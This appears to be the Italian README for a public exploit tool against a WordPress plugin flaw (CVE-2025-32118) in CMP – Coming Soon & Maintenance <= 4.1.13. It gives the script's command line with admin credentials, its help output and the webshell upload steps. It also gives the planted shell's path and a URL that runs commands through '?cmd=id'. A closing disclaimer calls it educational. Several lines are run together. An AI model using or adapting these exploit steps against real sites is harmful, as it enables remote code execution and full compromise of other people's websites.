
Plugin WordPress CMP – Coming Soon & Maintenance <= 4.1.13 - Vulnerabilità di esecuzione di codice in remoto (RCE)
🔍 Titolo: Plugin CMP – Coming Soon & Maintenance di WordPress <= 4.1.13 - Esecuzione di codice in remoto (RCE)
🗓️ Pubblicato: 2025-04-04
🔐 CWE: CWE-434 - Caricamento senza restrizioni di file con tipo pericoloso
📊 CVSS: 9.1 (CRITICO) — CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Esiste una vulnerabilità critica di Esecuzione di codice in remoto (RCE) nel plugin CMP – Coming Soon & Maintenance per WordPress (<= 4.1.13).
Questa falla consente a un utente amministratore autenticato di caricare file ZIP dannosi contenenti shell PHP eseguibili, portando alla compromissione completa del sito.
<= 4.1.13)python3 CVE-2025-32118.py -u http://target-site.com/wordpress -un admin -p password
usage: CVE-2025-32118.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit For CVE-2025-32118 : By Nxploited - Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Base URL of WordPress site
-un, --username USERNAME Admin username
-p, --password PASSWORD Admin password
| Flag | Description |
|---|---|
-u | URL di base del sito WordPress |
-un | username |
-p | password |
nonce valido per la richiesta di upload.style.css (formato tema valido)nxploitedshell.php (payload RCE)?cmd=whoami.Una volta caricata con successo, la shell si troverà in:
/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php
Provala tramite:
http://target-site.com/wp-content/plugins/cmp-premium-themes/nxploitedshell/nxploitedshell.php?cmd=id
Questo exploit è solo a scopo educativo.
L'uso non autorizzato di questo codice contro sistemi che non possiedi è illegale e non etico.
Nxploited | Khaled Alenazi